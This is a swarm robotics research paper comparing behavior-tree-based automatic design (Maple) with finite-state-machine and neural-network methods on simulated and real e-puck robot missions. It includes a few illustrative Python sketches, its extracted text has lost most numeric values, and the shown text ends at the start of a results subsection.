the current practice of swarm robotics goes against the principle of planning, as the individual robots used are typically simple and reactive in the sense defined by brooks ( ). in the reactive paradigm, a low-level behavior is executed indefinitely until an external event triggers the indefinite execution of another low-level behavior, and so on. due to this cultural legacy, the low-level behaviors typically operated by robots within swarms do not have natural termination criteria, and therefore do not have success/failure states. in addition, the hardware limitations of the simple individual robots typically used in swarm robotics do not give them the capability of assessing natural termination criteria for the low-level behaviors they are executing. it is nonetheless possible to use behavior trees as a control software architecture for robot swarms, as has already been done by jones et al. ( ). however, to do so, design choices are needed and possibly only a subset of the functionalities of behavior trees can be used, which forces one to renounce the implicit planning that they offer. for example, jones et al. ( ) considered atomic commands as action nodes (i.e., move forward, turn left/right, or store data) that always return success after the second execution of the behavior, and never return failure. despite not benefiting from the full potential of behavior trees when combining low-level behaviors without natural termination criteria, it remains that the inherent modularity that they offer makes behavior trees a control architecture that is well worth exploring in the context of the automatic design of robot swarms. indeed, because each subtree is a valid structure, behavior trees are more easily manipulated than finite-state machines (colledanchise & Ögren, ). therefore, one could conceive tailored optimization algorithms based on local manipulations that explore the possible collective behaviors obtained by selecting, combining, and fine-tuning predefined modules into behavior trees more efficiently than into finite state machines.

in this work, we study the use of behavior trees in the fully automatic off-line design of robot swarms (birattari, ligot & hasselmann, ). we do so by developing a method that uses low-level behaviors that are more complex than those of jones et al. ( ), but less complex than those typically used in applications of behavior trees to other domains. indeed, rather than using atomic commands and assuming the artificial return of success after a given time, we use low-level behaviors as they are typically conceived in swarm robotics, that is, without the notion of success or failure.
we devised maple, a novel instance of automode that has at its disposal the same low-level behaviors and conditions used by vanilla and chocolate, with the goal of understanding the conditions under which it is beneficial to adopt behavior trees over finite state machines in modular automatic design. maple is in many aspects similar to chocolate: in fact, we only substituted probabilistic finite state machines with behavior trees. this way, differences in performance between the two methods can only be attributed to the different control architecture they adopt. because the behavioral modules adopted in maple only return running, maple produces control software in the form of behavior trees with a predetermined structure that only uses a subset of the behavior tree functionalities. in this structure, a conditional module is combined with a low-level behavior in order to act as a termination criterion for the said low-level behavior.

we present three empirical studies conducted on two missions. in the first one, we study the robustness of automatically generated control software in the form of behavior trees by comparing its performance in simulation and in reality. the results show that the control software generated by maple
we believe that, in order to develop low-level behaviors that are appropriate for behavior trees, one should overcome technical issues (that is, use robots whose hardware capabilities enable them to infer natural termination criteria) and a cultural legacy. behavior trees in this section, we give a brief description of behavior trees and their functioning. we adopt the framework that marzinotto et al. ( ) proposed to unify the different variants of behavior trees described in the literature. we refer the reader to the original description of the framework for more details. the original idea of behavior trees was proposed for the halo video game (isla, ). since then, behavior trees have found applications in many computer games, for example, spore and bioshock (champandard, dawe & hernandez-cerpa, ). recently, behavior trees have attracted the interest of the research community. initial research focused on the automatic generation of behaviors in video games, for example, the commercial game defcon (lim, baumgarten & colton, ) and the mario ai competition (perez et al., ). even more recently, behavior trees have found applications in the control of unmanned aerial vehicles (Ögren, ), surgical robots (hu et al., ), and collaborative robots (paxton et al., ). ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ a behavior tree is a control architecture that can be expressed as a directed acyclic graph with a single root. with a fixed frequency, the root generates a tick that controls the execution. the tick is propagated through the tree and activates each node that it visits. the path that the tick takes through the tree is determined by the inner nodes, which are called control-flow nodes. once the tick reaches a leaf node, a condition is evaluated or an action is performed. then, the leaf node immediately returns the tick to its parent together with one of the following three values: success, failure, or running. a condition node returns success, if its associated condition is fulfilled; failure, otherwise. an action node performs a single control step of its associated action and returns success, if the action is completed; failure, if the action failed; running, if the action is still in progress. when a control-flow node receives a return value from a child, it either immediately returns this value to its parent, or it continues propagating the tick to the remaining children. there are six types of control-flow nodes: sequence (!): ticks its children sequentially, starting from the leftmost child, as long as they return success. because it does not remember the last child that returned running, it is said to be memory-less. once a child returns running or failure, the sequence node immediately passes the returned value, together with the tick, to its parent. if all children return success, the node also returns success. selector (?): memory-less node that ticks its children sequentially, starting from the leftmost child, as long as they return failure. once a child returns running or success, the selector node immediately passes the returned value, together with the tick, to its parent. if all children return failure, the node also returns failure. sequence� (!�): version of the sequence node with memory: resumes ticking from the last child that returned running, if any. selector� (?�): version of the selector node with memory: resumes ticking from the last child that returned running, if any. 
parallel (⇉): ticks all its children simultaneously. it returns success if a defined fraction of its children return success; failure if that fraction of children return failure; running otherwise.
decorator (δ): is limited to a single child. it can alter the number of ticks passed to the child and the return value according to a custom function defined at design time.
in the context of automatic modular design, the most important properties of behavior trees are their enhanced expressiveness, the principle of two-way control transfers, and their inherent modularity (Ögren, ; colledanchise & Ögren, ). Ögren and coworkers have shown that, using only selector and sequence nodes, behavior trees generalize finite-state machines (Ögren, ; marzinotto et al., ). with parallel nodes, behavior trees are able to express individual behaviors that have no representation in classical finite-state machines. the principle of two-way control transfers implies that control can be passed from a node to its child, and can also be returned from the child, along with information about the state of the system. finally, behavior trees are inherently modular: each subtree is a valid behavior tree. due to this property, behavior trees can be easily manipulated, as one can move, modify, or prune subtrees without compromising the structural integrity of the behavior tree. the modularity of behavior trees could simplify the conception of tailored optimization algorithms based on local manipulations.

automode—maple
maple is an automatic modular design method that generates control software in the form of behavior trees. it does so by selecting, combining, and fine-tuning a set of predefined modules: the six low-level behaviors and the six conditions defined by francesca et al. ( ) for vanilla, and later used in chocolate (francesca et al., ). we introduce maple with the purpose of exploring the use of behavior trees as a control architecture in the automatic modular design of robot swarms. to conduct a meaningful study on the potential of behavior trees as a control architecture, we compare maple with chocolate, a state-of-the-art automatic modular design method that generates control software in the form of probabilistic finite-state machines (francesca et al., ; francesca & birattari, ). we conceived maple to be as similar as possible to chocolate so that differences in performance between the two methods can only be attributed to the different control architecture they adopt. maple and chocolate generate control software for the same robotic platform, they have at their disposal the same set of modules, and they use the same optimization algorithm. in a probabilistic finite-state machine generated by chocolate, a state is an instantiation of a low-level behavior and a transition is an instantiation of a condition. because low-level behaviors (the states of the finite-state machine) are executed until an external condition (a transition) is enabled, they do not have inherent termination criteria. the absence of natural termination criteria implies that, when used as action nodes in a behavior tree generated by maple, the low-level behaviors of chocolate can only return running. as a result, part of the control-flow nodes of behavior trees do not work as intended.
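the tick semantics summarized in the previous section can be made concrete with a short sketch. the following python snippet is purely illustrative and is not part of automode or of any simulator used in this work; the condition predicate and behavior step function it expects are hypothetical callables operating on an arbitrary robot state.

```python
# illustrative sketch of the tick semantics described above (not the authors' code).
from enum import Enum

class Status(Enum):
    SUCCESS = 1
    FAILURE = 2
    RUNNING = 3

class Condition:
    """leaf node: evaluates a boolean predicate against the robot state."""
    def __init__(self, predicate):
        self.predicate = predicate
    def tick(self, state):
        return Status.SUCCESS if self.predicate(state) else Status.FAILURE

class Action:
    """leaf node: performs one control step of a low-level behavior."""
    def __init__(self, step):
        self.step = step  # callable that executes one control step and returns a Status
    def tick(self, state):
        return self.step(state)

class Sequence:
    """memory-less sequence (→): ticks children left to right as long as they succeed."""
    def __init__(self, children):
        self.children = children
    def tick(self, state):
        for child in self.children:
            status = child.tick(state)
            if status is not Status.SUCCESS:
                return status  # running or failure is returned to the parent immediately
        return Status.SUCCESS

class Selector:
    """memory-less selector (?): ticks children left to right as long as they fail."""
    def __init__(self, children):
        self.children = children
    def tick(self, state):
        for child in self.children:
            status = child.tick(state)
            if status is not Status.FAILURE:
                return status  # running or success is returned to the parent immediately
        return Status.FAILURE
```

the memory variants (→* and ?*) differ only in that they store the index of the last child that returned running and resume ticking from that child at the next control cycle.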
with maple, we chose to use the unmodified modules of chocolate, and to force the generated behavior trees to adopt a restricted structure that only uses a subset of the control-flow nodes.

robotic platform
maple produces control software for the e-puck robot (mondada et al., ) equipped with several extension boards (garattoni et al., ), including the range-and-bearing board (gutiérrez et al., ). the predefined modules on which maple operates have access to a subset of the capabilities of the e-puck robot that are formally defined by the reference model rm . (hasselmann et al., )—see table .
table: reference model rm . (hasselmann et al., ). sensors and actuators of the e-puck robot. period of the control cycle: ms.
proximity: prox_i, with i ∈ { , …, }; values in [ , ]
light: light_i, with i ∈ { , …, }; values in [ , ]
ground: ground_i, with i ∈ { , …, }; values in {black, gray, white}
range-and-bearing: n ∈ { , …, }; v_d ∈ ([ , . ] m, [ , π] radian)
wheels: v_l, v_r; values in [− . , . ] m/s
the modules can adjust the velocity of the two wheels (v_l and v_r) of the robot, detect the presence of obstacles (prox_i), measure the intensity of the ambient light (light_i), and identify whether the ground situated directly beneath the robot is black, gray, or white (ground_i). the modules also have access to the number n of surrounding peers within a range of up to . m, as well as to a vector v_d = Σ_{m=1}^{n} (1/r_m, ∠b_m), where r_m and ∠b_m are the distance and bearing of the m-th neighboring peer (spears et al., ).

set of modules
maple has at its disposal the same set of modules used by vanilla (francesca et al., ) and chocolate (francesca et al., ). some of the modules are parametric, so that the optimization algorithm can fine-tune their behavior on a per-mission basis. the set comprises six low-level behaviors and six conditions. a low-level behavior is a way in which the robot operates its actuators in response to the readings of its sensors. a condition is a context that the robot perceives via its sensors. conditions contribute to determining which behavior is executed at any moment in time. in the behavior trees generated by maple, an action node is selected among the six low-level behaviors and a condition node is selected among the six conditions. in the following, we briefly describe the low-level behaviors and conditions. for the details, we refer the reader to their original description given by francesca et al. ( ).
low-level behaviors
exploration: if the front of the robot is clear of obstacles, the robot moves straight. when an obstacle is perceived via the front proximity sensors, the robot turns in place for a random number of control cycles drawn in {0, …, τ}, where τ is an integer parameter.
stop: the robot does not move.
phototaxis: the robot moves towards the light source. if no light source is perceived, the robot moves straight while avoiding obstacles.
anti-phototaxis: the robot moves away from the light source. if no light source is perceived, the robot moves straight while avoiding obstacles.
attraction: the robot moves towards its neighboring peers, following αv_d, where the real-valued parameter α controls the speed of convergence towards them. if no peer is perceived, the robot moves straight while avoiding obstacles.
repulsion: the robot moves away from its neighboring peers, following −αv_d, where the real-valued parameter α controls the speed of divergence. if no peer is perceived, the robot moves straight while avoiding obstacles.
conditions
black-floor: true with probability β, if the ground situated below the robot is perceived as black.
gray-floor: true with probability β, if the ground situated below the robot is perceived as gray.
white-floor: true with probability β, if the ground situated below the robot is perceived as white.
neighbor-count: true with probability z(n) = 1 / (1 + e^{g(n̄ − n)}), where n is the number of detected peers. the parameters g and n̄ control the steepness and the inflection point of the function, respectively.
inverted-neighbor-count: true with probability 1 − z(n).
fixed-probability: true with probability β.

control software architecture
the low-level behaviors of chocolate have no inherent success or failure criterion and can only return running when used as action nodes in behavior trees. to use chocolate's low-level behaviors as action nodes, we constrained maple to generate behavior trees that have a particular, restricted structure. this restricted structure only uses a subset of the control-flow nodes of the classical implementation of behavior trees. the top-level node is a sequence* node (→*) and can have up to four selector subtrees attached to it. a selector subtree is composed of a selector node (?) with two leaf nodes: a condition node as the left leaf node, and an action node as the right leaf node. figure illustrates a behavior tree with the restricted structure adopted here. we limit the maximal number of subtrees, and therefore the number of action nodes, to four so as to mimic the restrictions of chocolate, which generates probabilistic finite-state machines with up to four states. in the example of fig. , the left-most selector subtree (highlighted by the dashed box) is first ticked and action a1 is executed as long as condition c1 returns failure. if condition c1 returns success, the top-level node (→*) ticks the second selector subtree, and a2 is executed, provided that c2 returns failure. because the top-level node is a control-flow node with memory, the tick will resume at the second subtree in the following control cycle. a2 is therefore executed as long as c2 returns failure. although actions a1 and a4 are not in adjacent subtrees, a4 can be executed directly after a1, granted that conditions c1, c2, and c3 return success and c4 returns failure. when condition c4 of the last selector subtree returns success, the top-level node of the tree also returns success and no action is performed. in this case, the tree is ticked again at the next control cycle, and the top-level node ticks the left-most selector subtree again.
figure: illustration of a behavior tree with the restricted structure that maple can produce. maple generates a behavior tree by first defining the number of selector subtrees (highlighted by the dashed box), and by then specifying and fine-tuning the condition and action nodes that compose each selector subtree.
the size of the space spanning all possible instances of control software that can be produced by maple is in O(|B|^4 |C|^4) (up to four subtrees, each comprising one condition and one low-level behavior), where B and C are the sets of low-level behaviors and conditions, respectively (kuckling et al., b).
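to make the restricted structure and its execution concrete, here is a minimal, purely illustrative sketch; it is not the authors' implementation, and the black-floor condition and exploration behavior shown are hypothetical stand-ins for the real modules. it reproduces the semantics described above: a sequence* root with up to four selector subtrees, each pairing a condition with a low-level behavior that only returns running.

```python
# illustrative sketch of maple's restricted behavior tree structure (not the authors' code).

class RestrictedBehaviorTree:
    """sequence* root with up to four selector subtrees of the form (condition, behavior)."""

    def __init__(self, subtrees):
        assert 1 <= len(subtrees) <= 4   # mimic chocolate's limit of four states
        self.subtrees = subtrees         # list of (condition, behavior) callables
        self.current = 0                 # memory of the sequence* node

    def control_step(self, state):
        """one control cycle: the root propagates a single tick through the tree."""
        while True:
            condition, behavior = self.subtrees[self.current]
            if condition(state):
                # the selector subtree returns success, so the sequence* root moves on
                self.current += 1
                if self.current == len(self.subtrees):
                    # the last condition succeeded: the tree returns success, no action
                    # is performed, and the next tick restarts at the first subtree
                    self.current = 0
                    return "success"
                continue
            # the guarding condition failed: execute one control step of the behavior;
            # behaviors only return running, so the tick goes back to the root
            behavior(state)
            return "running"

# hypothetical modules acting on a dictionary that stands in for the robot state
def black_floor(state):      # condition: the ground below the robot is perceived as black
    return state["ground"] == "black"

def exploration(state):      # behavior: one control step of random exploration
    state["wheels"] = "explore"

tree = RestrictedBehaviorTree([(black_floor, exploration)])
tree.control_step({"ground": "gray", "wheels": None})   # condition fails -> exploration runs
```

in this sketch, a behavior keeps being executed until the condition that guards its subtree returns success, which is exactly the role that conditions play as external termination criteria in maple.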
the search space can be formally defined as:
⟨ t, #N^(1), N^(1)_i, #L_i, L_ij, L^p_ij ⟩, with i ∈ {1, …, #N^(1)} and j ∈ {1, …, #L_i},
where t ∈ {sequence*} is the type of the top-level node; #N^(1) ∈ {1, …, 4} is the number of level-1 nodes; N^(1)_i ∈ {selector} is the type of the level-1 node i; #L_i ∈ {2} is the number of leaves of node i; L_ij is the type of the j-th leaf of node i, with L_i1 ∈ C and L_i2 ∈ B; and L^p_ij are the parameters of leaf L_ij.

optimization algorithm
maple uses iterated f-race (balaprakash, birattari & stützle, ; lópez-ibáñez et al., ) as an optimization algorithm. iterated f-race searches the space of all possible candidate solutions for the best one according to a mission-specific measure of performance. the iterated f-race algorithm comprises multiple steps, each of which is reminiscent of a race. in the first race, a uniformly distributed set of candidate solutions is sampled. these candidates are initially evaluated on a set of different instances. typically, an instance describes the configuration of the arena at the beginning of an experiment (that is, positions and orientations of the robots, positions of possible obstacles or objects of interest, or color of the floor). after the initial set of evaluations is performed, a friedman test (friedman, , ; conover, ) is performed on the performance obtained by the candidate solutions. the candidate solutions that perform significantly worse than at least another one are discarded. the algorithm keeps evaluating the remaining candidate solutions on new instances and discards those that are statistically dominated. the race terminates when only one surviving candidate solution remains, or when the maximal number of evaluations defined for the race is reached. in the following races, the new set of candidate solutions is sampled with a distribution that gives higher priority to solutions that are similar to the surviving solutions of the previous race.

experimental setup
in this section, we describe the experimental setup that is common to the three studies conducted. in particular, we describe the previously proposed automatic design methods against which we compare maple, the missions for which we generate control software, and the protocol we follow. further details are given in each of the sections dedicated to the specific studies.
automatic design methods
in studies 1 and 2, we compare maple with two previously proposed methods: chocolate and evostick. maple is described in the previous section; here, we briefly describe chocolate and evostick, and we refer the reader to francesca et al. ( , ) for the details. chocolate (francesca et al., ) is an automatic modular method that selects, combines, and fine-tunes the same twelve predefined modules as maple. in chocolate, the architecture of the control software is a probabilistic finite-state machine. in this context, a state is an instance of a low-level behavior and an edge is an instance of a condition. similarly to maple, chocolate adopts iterated f-race as an optimization algorithm. with chocolate, the search space of iterated f-race is restricted to probabilistic finite-state machines that comprise up to four states, and up to four outgoing edges per state. the size of the search space defined by the control architecture of chocolate is in O(|B|^4 |C|^16), where B and C are the sets of low-level behaviors and of conditions, respectively (kuckling et al., b).
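the iterated racing procedure described in the optimization algorithm section above can be sketched in a few lines. the snippet below is a heavily simplified, illustrative single race and is not the irace package used in this work: the candidate sampler draws points of maple's restricted search space, the evaluation function is a hypothetical placeholder for one simulation run, and the post-friedman elimination step is approximated with pairwise wilcoxon signed-rank tests against the current best candidate (the actual f-race uses a different post-hoc analysis and a more elaborate budget management).

```python
# simplified, illustrative sketch of one race; not the irace implementation used by the authors.
import random
from scipy.stats import friedmanchisquare, wilcoxon

def sample_candidate(behaviors, conditions, max_subtrees=4):
    """sample one point of maple's search space: up to four (condition, behavior) subtrees."""
    n = random.randint(1, max_subtrees)
    return [(random.choice(conditions), random.choice(behaviors)) for _ in range(n)]

def race(candidates, evaluate, instances, min_instances=5, alpha=0.05):
    """evaluate candidates on successive instances, discarding statistically dominated ones.

    evaluate(candidate, instance) is a hypothetical, mission-specific performance measure
    corresponding to one simulation run; larger values are assumed to be better.
    """
    scores = {id(c): [] for c in candidates}
    alive = list(candidates)
    for k, instance in enumerate(instances, start=1):
        for c in alive:
            scores[id(c)].append(evaluate(c, instance))
        if k < min_instances or len(alive) < 3:
            continue
        # friedman test: are the surviving candidates distinguishable at all?
        _, p = friedmanchisquare(*[scores[id(c)] for c in alive])
        if p >= alpha:
            continue
        # simplified elimination: drop candidates significantly worse than the current best
        # (identical score vectors are not handled; this is only a sketch)
        best = max(alive, key=lambda c: sum(scores[id(c)]) / len(scores[id(c)]))
        survivors = [best]
        for c in alive:
            if c is not best:
                _, p_pair = wilcoxon(scores[id(best)], scores[id(c)], alternative="greater")
                if p_pair >= alpha:
                    survivors.append(c)
        alive = survivors
        if len(alive) == 1:
            break
    return alive
```

in iterated f-race, the surviving candidates of one race then bias the sampling distribution of the next race, so that new candidates are drawn preferentially in the neighborhood of the best solutions found so far.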
evostick (francesca et al., , ) is a straightforward implementation of the evolutionary swarm robotics approach. in evostick, the architecture of the control software is a fully-connected, single-layer, feed-forward neural network. the neural network comprises input nodes for the readings of the sensors described in the reference model rm . : for the proximity sensors, for the light sensors, for the ground sensors, and for the range-and-bearing board. out of the five input nodes dedicated to the range-and-bearing board, one is allocated to the number of detected peers and the four others are allocated to the scalar projection of the vector v_d on four unit vectors. the neural network comprises output nodes controlling the velocities of the wheels. the topology of the neural network is fixed, and an evolutionary algorithm fine-tunes the weights of the connections between the input and the output nodes. each weight is a real value restricted to a bounded range. in evostick, the population comprises a fixed number of individuals that are each evaluated several times per generation.

missions
we consider two missions: foraging and aggregation. the two missions must be performed in a dodecagonal arena delimited by walls and covering an area of . m². the swarm is composed of e-puck robots that are distributed uniformly in the arena at the beginning of each experimental run, and we limit the duration of each run to a fixed mission time.
foraging
because the robots cannot physically carry objects, we consider an idealized form of foraging. in this version, we consider that an item is picked up when a robot enters a source of food, and that a robot drops a carried item when it enters the nest. a robot can only carry one item at a time. in the arena, a source of food is represented by a black circle, and the nest is represented by the white area (see fig. ). the two black circles have a radius of . , they are separated by a distance of . , and are located at . from the white area. a light source is placed behind the white area to indicate the position of the nest to the robots. the goal of the swarm is to retrieve as many items as possible from the sources to the nest. in other words, the robots must go back and forth between the black circles and the white area as many times as possible. the objective function is f_f = i, where i is the number of items deposited in the nest.
figure: foraging. (a) simulated arena. (b) real arena. the red glow visible in the picture is due to a red gel we placed in front of the light source. with the red gel, the light does not disturb the overhead camera that is used to track the position of the robots and compute the objective function. yet, the light is still perceived by the robots that use their infrared sensors to sense it.
aggregation
the swarm must select and aggregate in one of the two black areas (see fig. ). the two black areas have a radius of . and are separated by a distance of . . the objective function is f_a = max(n_l, n_r)/n, where n_l and n_r are the number of robots located on the left and the right black area, respectively, and n is the total number of robots in the swarm. the objective function is computed at the end of a run and is maximized when all the robots have aggregated in the same black area.
figure: aggregation. the objective function f_a is computed as the maximal fraction of robots situated either on the left area (n_l/n) or on the right area (n_r/n). it is evaluated at the end of an experimental run. (a) simulated arena, with f_a = . , as some robots stand on the left black area and no robot stands on the right one (n_r = 0). (b) real arena, with f_a = . .
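since both objective functions are simple closed-form expressions, they can be restated directly in code; the snippet below is a trivial illustration with hypothetical argument names, not part of the authors' experimental infrastructure.

```python
def foraging_objective(items_deposited_in_nest):
    """f_f: number of items retrieved to the nest during a run (to be maximized)."""
    return items_deposited_in_nest

def aggregation_objective(n_left, n_right, n_total):
    """f_a = max(n_l, n_r) / n, computed once at the end of a run.

    equals 1.0 when the whole swarm has aggregated on a single black area and
    decreases as the swarm splits between the two areas or leaves them."""
    return max(n_left, n_right) / n_total

# example: 15 robots on the left area, 2 on the right, swarm of 20 robots
assert aggregation_objective(15, 2, 20) == 0.75
```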
full-size doi: . /peerj-cs. /fig- ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ left and right black area, respectively; and n is the total number of robot in the swarm. the objective function is computed at the end of a run and is maximized when all the robots have aggregated in the same black area. dummy control software throughout the three studies, we compare the performance of automatically generated control software to the one of two instances of control software—one per mission—that we call “dummy” control software. they perform a simple, naive, and trivial behavior that we can consider as a baseline for each mission. with this comparison, we assess whether the automatic design methods can produce behaviors that are more sophisticated than trivial solutions. to produce the two instances of dummy control software, we used the same low-level behaviors and conditions that maple and chocolate have at their disposal to generate control software. for foraging, we consider a strategy in which the robots move randomly in the environment. we obtained this strategy by using the low-level behavior exploration. for aggregation, we consider a strategy in which the robots explore the environment randomly, and stop when they encounter a black spot. we obtained this strategy by combining the modules exploration, black-floor, and stop. to fine-tune the parameters of the modules, we used iterated f-race with a design budget of k simulation runs. methodology to account for the stochasticity of the design process, we execute each design method several times, and therefore produce several instances of control software. the number of executions of the design methods varies with the study. to evaluate the performance of a design method, each instance of control software is executed once in simulation. in study , each instance of control software is also executed once in reality. simulations are performed with argos , version beta (pinciroli et al., ; garattoni et al., ). in the experiments with the robots, we use a tracking system comprising an overhead camera and qr-code tags on the robots to identify and track them in real time (stranieri et al., ). with this tracking system, we automatically measure the performance of the swarm, and we automatically guide the robots to the initial position and orientation for each evaluation run. during an evaluation run, the robots may tip over due to collisions. to avoid damages, we intervene to put them upright. in the three studies, we present the performance of the design methods in the form of box-and-whiskers boxplots. in addition, we present the median performance of the dummy control software assessed in simulation with a dotted horizontal line. in each study, statements such as “method a is significantly better/worse than b” imply that significance has been assessed via a wilcoxon rank-sum test, with confidence of at least %. the instances of control software produced, the experimental data collected in simulation and in reality, and videos of the behavior displayed by the swarm of physical robots are available online as supplemental material (ligot et al., ). ligot et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. 
study 1: performance in simulation and reality
in this section, we evaluate maple's ability to produce control software that crosses the reality gap satisfactorily. to do so, we compare the performance of control software generated by three design methods—maple, chocolate and evostick—both in simulation and in reality. previous research (francesca et al., ) indicates that chocolate crosses the reality gap more satisfactorily than evostick. francesca et al. ( , ) argue that chocolate's ability to cross the reality gap is mainly due to its modular nature. because maple shares with chocolate the same modular nature and differs from it only in the control architecture adopted, we expect maple to also experience smaller performance drops than evostick. we executed each design method several times, and thus produced a corresponding number of instances of control software. the design budget allocated to each method is k simulation runs. the results are depicted in fig. .
foraging
in simulation, the performance of the control software produced by the three automatic design methods is similar, and is significantly better than that of the dummy strategy. in reality, evostick is significantly worse than maple and chocolate. the performance of all three methods drops significantly when passing from simulation to reality, but evostick suffers from the effects of the reality gap the most. see fig. a. most of the instances of control software generated by maple and chocolate display similar strategies: the robots explore the environment randomly and, once a black area (that is, a source of food) is found, they navigate towards the light to go back to the white area (that is, the nest).
figure: results of study 1. the gray boxes represent the performance assessed in simulation; the white boxes, the one assessed in reality. the dotted line represents the median performance of the dummy control software assessed in simulation.
one instance of control software produced by maple uses the anti-phototaxis low-level behavior to leave the nest faster once an item has been dropped. three instances of control software produced by chocolate display an even more sophisticated strategy: the robots only explore the gray area in the search for the sources of food. in other words, the robots always directly leave the nest if they enter it, independently of whether they dropped an item or not. in simulation, the instances of control software generated by evostick display drastically different behaviors than the ones produced by maple and chocolate: the robots navigate following circular trajectories that cross at least one food source and the nest. in reality, the robots follow circular trajectories that are much smaller than those displayed in simulation. as a result, the robots tend to cluster near the light. contrarily to maple and chocolate, and with the exception of a few cases, the instances of control software generated by evostick do not display an effective foraging behavior.
aggregation
in simulation, evostick performs significantly better than maple and chocolate, which show similar performance. in reality, we observe an inversion of the ranks: maple and chocolate perform significantly better than evostick.
indeed, the performance of evostick drops considerably, whereas the performance drop experienced by maple and chocolate is smaller. see fig. b. the instances of control software produced by maple and chocolate efficiently search the arena and make the robots stop on the black areas once they are found. in simulation, with the control software produced by evostick, the robots follow the border of the arena and then adjust their trajectory to converge towards neighboring peers that are already situated on a black spot. in reality, the control software generated by evostick does not display the same behavior: robots are unable to find the black areas as efficiently as in simulation because they tend to stay close to the borders of the arena. moreover, the robots tend to leave the black areas quickly once they have found them. although the three design methods perform significantly better than the dummy control software in simulation, none of the methods produced control software that makes the physical robots reach a consensus on the black area on which they should aggregate.

study 2: performance versus design budget
in this section, we investigate the performance of maple and chocolate across different design budgets. because the search space (that is, all instances of control software that can be generated) of chocolate is significantly larger than the one of maple—O(|B|^4 |C|^16) and O(|B|^4 |C|^4), respectively (kuckling et al., b)—we expect maple to converge to high-performing solutions faster than chocolate. we consider design budgets of . k, k, k, k, k, and k simulation runs. for each design budget, we executed each design method multiple times, and thus produced multiple instances of control software; in total, the two design methods have been executed an equal number of times. the results are depicted in fig. .
foraging
the performance of the two methods shows different trends when the design budget increases. for maple, there is a significant improvement of the performance between design budgets of k and k, and between k and k simulation runs. for chocolate, the performance increases significantly between design budgets of k and k, k and k, and k and k simulation runs. see fig. a. with very small design budgets— . k and k simulation runs—maple and chocolate show similar performance: they are unable to find solutions that are better than the dummy control software. with a small design budget— k simulation runs—maple performs significantly better than chocolate. also, with k simulation runs, chocolate and the dummy control software show similar performance. with a large design budget— k runs—chocolate performs significantly better than maple. indeed, the instances of control software generated by chocolate display a more sophisticated foraging strategy than those generated by maple: to increase the rate of discovery of the food sources, the robots only explore the gray area of the arena, and stay away from the nest. it appears that, with maple's restrictions on the structure of the behavior trees, this strategy cannot be produced. indeed, in the instances of control software that can be produced by maple, only one condition can terminate the execution of the action being performed, whereas in the ones produced by chocolate, up to four conditions can. therefore, with maple, the robots are forced to explore the whole arena until they find the food sources (that is, the black circles).
however, it is important to notice that the behavior trees generated by maple with a design budget of k simulation runs are only outperformed by probabilistic finite-state machines when k simulation runs are allocated to chocolate.
figure: results of study 2. performance of maple and chocolate over multiple design budgets, expressed in number of simulation runs. light gray boxes represent the performance of maple, dark gray boxes the one of chocolate. the dotted line represents the median performance of the dummy control software.
aggregation
the performance of the control software generated by both methods increases almost steadily with the design budget. also for this mission, chocolate requires a design budget of at least k simulation runs in order to generate control software that is significantly better than the dummy control software. contrarily, maple only requires k simulation runs. with k and k simulation runs, maple outperforms chocolate. for larger design budgets, maple and chocolate show similar performance. see fig. b. although the design budgets considered allow the two methods to outperform the dummy control software on multiple occasions, neither of them generated control software that completed the mission satisfactorily. indeed, the maximal median performance obtained is f_a = . , which means that only a fraction of the robots were on the same black spot.

study 3: maple and some of its possible variants
in this section, we explore the changes in performance when variations to the control architecture of maple are introduced. our exploration is not exhaustive: we only consider variants that generate behavior trees whose structure is similar to the one of the behavior trees generated by maple. we limit our exploration to variants that generate trees with: (i) three levels (top-level, inner, and leaf nodes); (ii) up to four branches connected to the top-level node; and (iii) exactly two leaf nodes per branch. many variants are possible; however, because the action nodes of maple can only return running, some variants are unable to combine low-level behaviors into meaningful and elaborate individual behaviors. descriptions of these variants, as well as illustrations, are given as part of the supplemental material (ligot et al., ). in the following, we describe the variants that are promising and explain how they behave with the modules considered in maple. we tested the most promising variants by generating control software and evaluating their performance in simulation, and report the results below.
alternative behavior tree structures
icfn (inverted control-flow nodes): the control-flow nodes are inverted with regard to the ones of maple: the top-level node is a selector* node and the inner nodes are sequence nodes. see fig. a. in this variant, the action node of a subtree is executed as long as the condition returns success, whereas it is executed until the condition returns success in maple.
nd (negation decorator): a negation decorator node can be instantiated above a condition node. see fig. b. the negation decorator returns failure (success) if the condition returns success (failure).
with the set of conditions available, it is particularly interesting to place a negation decorator above a condition on the color of the ground perceived (that is, black-, gray-, or white-floor). indeed, placing a negation decorator node above a neighbor-count condition is equivalent to having an inverted-neighbor-count condition, and vice versa. similarly, a negation decorator above a fixed-probability condition with probability ρ is equivalent to a fixed-probability condition with probability 1 − ρ. however, a negation decorator above a condition on a given color is equivalent to assessing the conditions for the two other colors simultaneously.
fl (free leaves): each leaf node is to be chosen between condition and action nodes. see fig. c. four pairs of leaf nodes are possible: condition–condition (see first branch), condition–action (which corresponds to the leaf pair imposed in maple, see second branch), action–condition (see third branch), and action–action (see fourth branch). for each subtree, the optimization algorithm is free to choose any pair of leaf nodes. the variant can express disjunction of conditions: a branch following a condition–condition leaf pair is ticked if the first or the second condition is met. however, the variant introduces dead-end states: when an action on the left-hand side of a leaf pair is ticked, the action is executed for the remainder of the simulation run.
ca|cc (condition–action or condition–condition): the right-hand side leaf node can be a condition or an action node. two pairs of leaf nodes are thus possible: condition–action and condition–condition. with respect to fl, this variant can also express disjunction of conditions, but does not allow for dead-end states.
figure: a few examples of maple's variants. (a) variant icfn (inverted control-flow nodes), (b) variant nd (negation decorator), (c) variant fl (free leaves). the number of branches connected to the top-level node, and their order, has been chosen arbitrarily.
sp (success probability): each action node has a probability ρ to return success. the probability ρ is a real value in the range [0, 1] and is tuned by the optimization process. with this probability, we simulate the capability of the action nodes to assess whether the low-level behaviors are successfully executed.
results
for each variant, we produced several instances of control software, all generated by the same optimization process—iterated f-race—with a design budget of k simulation runs. we compare the performance of the variants to that of maple.
foraging
